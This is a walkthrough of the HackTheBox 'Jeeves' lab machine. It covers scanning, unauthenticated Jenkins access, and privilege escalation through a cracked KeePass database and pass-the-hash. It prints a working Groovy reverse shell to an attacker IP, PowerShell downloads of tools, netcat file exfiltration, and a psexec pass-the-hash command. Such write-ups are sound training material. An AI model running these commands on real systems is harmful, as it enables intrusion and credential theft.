HTB – Jeeves

In this walk through, we will be going through the Jeeves room from HackTheBox. This room is rated as Medium on the platform and it consists of exploitation of running Jenkins application. For privilege escalation, we have to crack a Keepass DB to get the admin hash and captured the root flag by exposing it via ADS. So, let’s get started without any delay.

Machine Info:

Enumeration:

• I started off with a regular nmap scan with service version detection and found 4 ports opened – 80 (HTTP), 135 (RPC), 445 (SMB) and 50000 (Jetty).

$ sudo nmap -sS -sV 10.10.10.63

Nmap scan report for 10.10.10.63
Host is up (0.26s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds

• Enumerated the application running on port 80 and found that it is redirecting to a page with an error image. Nothing useful here.

• Next, moved to the web server running on port 50000 with the jetty installation. Looked for any known exploits for the installed version but found nothing.

• Fired up gobuster on the web server to reveal some hidden directories. Got a very late hit at – askjeeves.

$ gobuster dir -u http://10.10.10.63:50000/ -w ~/Desktop/Wordlist/directory-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.63:50000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/01 22:19:18 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

Initial Access:

• Navigating to the directory reveals a Jenkins installation with no authentication required to access.

• Next, i used the below groovy payload in the script console to trigger a reverse shell connection back at my netcat listener on port 4444. Thus, getting the initial foothold.

String host="10.10.14.2";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

• Got the user flag. Easy!

Privilege Escalation:

• Next, downloaded winpeas on to the target and hoped for some low hanging priv esc vectors but found no luck.

powershell.exe -command iwr -Uri http://10.10.14.2:8000/winPEASx64.exe -OutFile winpeas.exe

• Moving on, found a Keepass Database file in kohsuke’s documents folder. Downloaded netcat binary on to the target and used it to transfer the database file to our local machine.

powershell.exe -command iwr -Uri http://10.10.14.2:8000/nc.exe -OutFile nc.exe

nc -lp 1234 > pass.kdbx

nc.exe -w 3 10.10.14.2 1234 < CEH.kdbx

• Next, used keepass2john to convert the file into a john crackable hash and then fired john on it to crack the password. Finally got the password – moonshine1

$ ~/Tools/john/run/keepass2john pass.kdbx > hash
wh1terose@fsociety:~/CTF/HTB/machines/Jeeves$ ls
hash  pass.kdbx
wh1terose@fsociety:~/CTF/HTB/machines/Jeeves$ ~/Tools/john/run/john hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-12-01 23:24) 0g/s 4129p/s 4129c/s 4129C/s Pass1905..Pass1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
moonshine1       (pass)     
1g 0:00:00:04 DONE 2/3 (2023-12-01 23:24) 0.2169g/s 4636p/s 4636c/s 4636C/s emmitt22..123QWEasd
Use the "--show" op

• Used it to access the database and got a NTLM hash for backup.

• Tried to pass the hash on to the target machine as user “Administrator” and got a success!

python3 psexec.py "Administrator"@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

• At this point of time, i was confident to get the root flag however one more false positive. The hints asked us to look deeper. That means, the file might contain some hidden text or message.

• Downloaded the streams binary onto the target machine to analyze the text file properly for any hidden data.

powershell.exe -command iwr -Uri http://10.10.14.2:8000/streams64.exe -OutFile streams.exe

• On using streams binary found out that the root.txt is being hidden inside the the text file using ADS.

streams.exe -accepteula hm.txt

• Accessed the data within the hidden file and captured the root flag.

more < hm.txt:root.txt:$DATA

Also Read: HTB – Intelligence

Conclusion:

So that was “Jeeves” for you. The machine features a Windows machine that has a Jenkins installation on port 50000. Next, exploited it using the groovy script console to get the initial access. For privilege escalation, found a Keepass database named CEH.kdbx, cracking it gives us the Administrator NTLM hash. Using the hash got access as admin and finally captured the hidden root flag by exposing it via ADS. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.